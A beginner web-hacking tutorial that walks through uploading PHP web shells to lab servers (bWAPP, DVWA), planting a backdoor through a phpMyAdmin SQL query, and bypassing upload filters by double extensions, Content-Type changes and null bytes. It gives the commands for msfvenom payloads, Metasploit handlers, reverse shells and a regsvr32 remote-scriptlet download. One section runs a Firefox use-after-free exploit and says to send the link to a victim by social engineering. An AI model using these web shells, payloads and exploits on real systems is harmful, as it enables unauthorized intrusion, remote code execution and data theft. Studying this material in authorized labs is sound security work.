Web Shells Penetration Testing (Begineer Guide)

 Through this article I would like to share file uploading using different type web shell scripts on a web server and try to get unauthorized access in the server.

Web shells are the scripts that are coded in different languages like PHP, Python, ASP, Perl and many other languages which further use as backdoor for unauthorized access in any server by uploading it on a web server.

Once the shell get uploaded on the target location, the attacker may able to perform the read and write operation directly, he will be able to edit any file or delete the file from the server.

Attacker: Kali Linux

Target: Bwapp

Let’s begin!!!

B374k script

Open terminal and type following command to download b374k script from github.

Git clone https://github.com/b374k/b374k

This is a PHP shell which provides reveres connection to the attacker machine and where he can execute the command to retrieve victim’s information.

Following command will create a malicious file shell.php as the backdoor shell with password raj123.

Php –f index.php -- -o shell.php –p raj123

Now let’s open the target IP in browser: 192.168.1.103:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select Unrestricted File Upload now and click on hack.

Here you can see the web server allow us to upload an image under the web page of unrestricted file upload.

Click on browse to upload the shell.php in the web server and then click on upload.

Now you can read the message from the screenshot that”image has been uploaded here” which means our php backdoor is uploaded successfully. Now click on the link “here”.

Here required password to execute shell.php and I had given raj123 as its password.

From given screenshot you can see, we are inside the directory of images.

Click on terminal tab from menu bar of b374k which will provide victims terminal to execute the desired commands. From given image you can read the command which I have executed.

Lsb_release -a

Now I will connect b347k shell from netcat and try to access victim’s shell. Open the terminal in kali Linux and type following command for netcat.

Nc 192.168.0.103 8888

Inside shell b347k from menu select network option to open bind connection give IP of target: 192.168.0.103 as server IP and port 8888 now scroll down the list and select Perl then click on run.

This will give you reverse connection on netcat and from the given screenshot you can read the victim information which I have got when I execute the following commands.

Whoami

Cat/etc/passwd

C99shell script

Download c99shell from the given link

https://github.com/tennc/webshell/tree/master/php/PHPshell/c99shell

C99shell is a PHP backdoor which provides details of files and folders when it get uploaded and let you perform command execution through it.

This time again open web server IP in the browser to upload the c99shell.php

Here you can read the message from the screenshot that”image has been uploaded here” which means our php backdoor is uploaded successfully. Now click on the link “here”.

Here our php malicious file is executed where it is dumping the names of 25 files. From screenshot you can see all files under images directory are jpg, png, gif images.

Now select bind option from menu to connect host from netcat. Repeat the same process to run netcat at the background and then give host IP: 192.168.0.103 and port: 8888 select using Perl and click on connect.

This  will give you reverse connection on netcat.

Weevely Web Shell

Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shapes an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environment.

Open the terminal and type following command which will create a web shell as backdoor.php on the Desktop with password pass.

weevely generate raj123 /root/Desktop/weevely.php

Open the target location where you want to upload your backdoor. Now I am going to browse weevely.php and then click on upload to upload your web shell. Now you can see from the given screenshot the weevely.php has been successfully uploaded.

Make right click on the link “here” and click on copy link location.

Again type following command to start the attack on the web server and post above copied URL with password raj123 inside the weevely command.

weevely http://192.168.1.103:81/bWAPP/images/weevely.php raj123

Now you can see that I have got victim shell through Weevely. Now type following command to retrieve victim’s information.

Whoami

Cat/etc/password

Type help in front of weevely which will show all module present inside it.

WSO script

Download this script from given link.

https://cloud.github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.php

This also a PHP script which is quite similar to c99shell.php & b347k.php shells and perform same function as c99 script.

Again repeat the same process to upload wso2.5.1.php script inside the bwapp then click on link “here”.

After executing the shell, you will see it has retrieved the basic information of target and dump the files and folder names.

Now all options are same as above, now try yourself to connect this shell with netcat.

Shell Uploading in Web Server through PhpMyAdmin

In this tutorial we will learn how to exploit a web server if we found phpmyadmin panel has been left open. Here I will try to exploit phpmyadmin which is running inside the localhost “xampp” by generating a SQL query to execute malicious code and then make an effort to access the shell of victim’s Pc.

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.

Features

·         Intuitive web interface

·         Support for most MySQL features:

·         browse and drop databases, tables, views, fields and indexes

·         create, copy, drop, rename and alter databases, tables, fields and indexes

·         maintenance server, databases and tables, with proposals on server configuration

·         execute, edit and bookmark any SQL-statement, even batch-queries

·         manage MySQL user accounts and privileges

·         manage stored procedures and triggers

·         Import data from CSV and SQL

·         Export data to various formats: CSV, SQL, XML, PDF, ISO/IEC 26300 - OpenDocument Text and Spreadsheet, Word, L^AT_EX and others

·         Administering multiple servers

·         Creating graphics of your database layout in various formats

·         Creating complex queries using Query-by-example (QBE)

·         Searching globally in a database or a subset of it

·         Transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link

For information visit: https://www.phpmyadmin.net

Lets start!!!

Open the localhost address:192.168.1.101:81 in the browser and select the option phpmyadmin from the given list of xampp as shown the following screenshot.

When you come into PhpMyAdmin application, here you will find different areas. On the left side of the screen you can see the list of database names. As we are inside the administration console where we can perform multiple tasks which I have defined above therefore I am going to create a new database

Now click on new to create a database.

Give name to your database as I have given Ignite technologies and click on create.

Now you can see the database ignite technologies has been added in the list of databases.

Click on ignite technologies database to construct MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.

Now this is interesting part because here I am going to execute a malicious code as SQL query which will create a command shell vulnerability inside the web server. 

SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php"

In the following screenshot you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.

Now type following URL to find whether we are successful or not in order to create OS command shell vulnerability.

http://192.168.1.101:81/backdoor.php

Awesome!!!  You can see it has given warning which means we had successfully created OS command shell vulnerability.

http://192.168.1.101:81/backdoor.php?cmd=dir

When you execute above URL in the browser you will get the information of victim‘s PC directories.

Next step will to achieve meterpreter session of victim’s Pc.

Open other terminal in kali Linux and type following command.

msfconsole

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.104

msf exploit(regsvr32_applocker_bypass_server) > set lport 4444

msf exploit(regsvr32_applocker_bypass_server) > exploit

Copy the selected part for dll file and use this malicious code as the command inside the URL.

regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll

Paste the above code the URL and execute it which will give meterpreter session on metasploit

http://192.168.1.101:81/backdoor.php?cmd= regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll

From following screenshot you can see meterpreter session 1 opened.

Sessions –i 1

Meterpreter>sysinfo

Hack Windows PC using FirefoxnsSMILTimeContainer::NotifyTimeChange() RCE

This module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.

Exploit Targets

Firefox 38

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/firefox_smil_uaf

msf exploit (firefox_smil_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_smil_uaf)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (firefox_smil_uaf)>set srvhost 192.168.0.104 (IP of Local Host)

msf exploit (firefox_smil_uaf)>set uripath / (IP of Local Host)

msf exploit (firefox_smil_uaf)>exploit

Now an URL you should give to your victim http://192.168.0.104:8080/ victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

5 ways to File upload vulnerability Exploitation

File upload vulnerability is a major problem with web based applications. In many web servers this vulnerability depends entirely on purpose, that allows an attacker to upload a file with malicious code in it that can be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and in some chances to sensitive data might be informal, by unauthorized people.

In this tutorial we are going to disscuss various types of file upload vulnerbility and then try to exploit them. You will learn the different injection techniques to upload a malicious file of php in a web server and exploit them.

Basic file upload Technique

In this scenario a simple php file will get uploaded on the web server without any restrictions, here server does not check the content- type or file extensions to be uploaded.

For example if server allows to upload a text file or image, which is considered as data and if security parameter is low where as no restrictions  on the content-type or filename then you can easily bypass malicious php file which is considered as application in the web server.

Let’s start!!!

Click on DVWA Security and set Website Security Level low

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f raw

Copy and paste the highlighted code in leafpad and save as with PHP extension as img.php on the desktop.

Load metasploit framework type msfconsole and start multi handler.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Now click on browse tag to browse img.php file to upload it on web server and click on upload which will upload your file on web server.

After uploading the PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.

hackable/uploads/img.php

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo

You can observe, I have got meterpreter session 1 of victim PC on the metasploit.

Double extension injection Technique

Click on DVWA Security and set Website Security Level medium

Here we come across a situation where it would check the file extension. In medium security it only allows .jpeg and .png extension file to be uploaded on the web server and restricts other files with single file extension while uploading in the web server. Now there are some techniques through which we will bypass the malicious PHP file in the web server.

 

It is an attempt to hide the real nature of a file by inserting multiple extensions with filename which creates confusion for security parameters. For example img1.php.png look like png image which is a data not an application but when the file is uploaded with double extension it will execute php file which is an application.

Let’s continue!!!

Repeat same process to create the php backdoor with msfvenom and now save the file as img1.php.png on desktop and run the multi handler at the background.

Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file as well as read the file name.

Click to file upload option from vulnerability menu. Again click on browse button to browse img1.php.png file to upload it. Now start burp suite and make intercept on under proxy tab.  Don’t forget to set manual proxy of your browser and click on upload.

 

Intercept tab will work to catch the sent request of the post method when you click to upload button.  Now change img1.php.png into img1.php inside the fetched data.

Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory.

After uploading the PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.

hackable/uploads/img1.php

This’ll provide a meterpreter session 2 when you run URL in browser.

 meterpreter > sysinfo

Content – Type file Upload

"Content-Type" entity in the header of the request indicates the internal media type of the message content. Sometimes web applications use this parameter in order to recognize a file as a valid one. For instance, they only accept the files with the "Content-Type" of "text/plain". It is possible to bypass this protection by changing this parameter in the request header using a web proxy.

Again repeat the same process to create the php backdoor with msfvenom and now save the file as img2.php on desktop and run the multi handler at the background

Start burp suite and repeat the process for fetching the sent request. In the screenshot you can read the content- type for php file; now change this content type application/x-php into image/png to upload your php file.

From below image you can perceive the manipulation in content type which known as content-type injection technique.

Now copy the selected part and past it in URL to execute it.

hackable/uploads/img2.php

This’ll provide a meterpreter session 3 when you run URL in browser.

 meterpreter > sysinfo

Null byte Injection

Null Byte Injection is an exploitation technique which uses URL-encoded null byte characters (i.e. , or 0x00 in hex) to the user-supplied data. A null byte in the URL is represented by '' which in ASCII is a "" (blank space).This injection process can alter the intended logic of the application and allow malicious adversary to get unauthorized access to the system files.

Now here you will see I have inserted a string at the end of extension and change that string into its  hex  value and then replace that hex value from null byte character ‘’. The reason behind inserting a null byte value is that, some application servers scripting language still use c/c++ libraries to check the filename and content. In c/c++  a line ends with /00 is called null byte.

Hence when the compiler studies a null byte at the end of the string, it will assume that it has arrived at the end of string and stop further reading of string.

Now create the php backdoor with msfvenom and now save the file as img3.php.jpg on desktop and run the multi handler at the background.

 

Start burp suite and repeat the process for fetching the sent request. It look same like double extension file but here the technique is quite different from double extension file uploading.

Add any string or alphabet as shown in the screenshot here and you will notice that in the highlighted text I have made change in img3.php.jpg into img3.phpD.jpg, now follow the next step will be to modify this string into null byte.

In next step we will decode the inserted string; now decode your string or alphabet as I had given ‘D’ now decodes it into hex which will tell its hex value and from screenshot you can read its hex value is 44.

Now click on hex option under intercept which will display the hex value of intercepted data. Here you can read the hex value for the file name which I have highlighted. In order to null exploitation replace the hex value 44 from null byte value 00.

Now you can perceive the changes from the given screenshot where I have injected the null value in the place of hex value of our inserted string.

When again you will view the raw data, now here you will find that the string ’D’ is changed into null byte value.

Now forward the intercepted data to exploit file upload through null byte injection technique. Great!!! We have bypass the medium security now copy the uploaded path and past it in URL to execute it.

When you will run the path it will give you reverse connection on metasploit and from the given screenshot you can see I have got meterpreter session 4 also. 

Blacklisting File Extensions

Next target is bwapp which is another web server Set security level medium, from list box choose your bug and select Unrestricted File Upload now and click on hack

Some sever side scripting language check .php extension at filename and allow only those file which does not contain .php extension. Here we can inject our file by changing a number of letters to their capital forms to bypass the case sensitive rule, for example PHp or PHP3.

Now create the php backdoor with msfvenom and now save the file as img4.php3 on desktop and run the multi handler at the background.

Then browse img4.php3 to upload in web server and click on upload tab. Here in medium security it will allow the php file to get upload on web server and from given screenshot you can see my php file is successfully uploaded.  Now click on the link here and you will get reverse connection at multi handler.

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo

Great!!!  You can see I have got meterpreter session 1.

Source: https://www.owasp.org/index.php/Unrestricted_File_Upload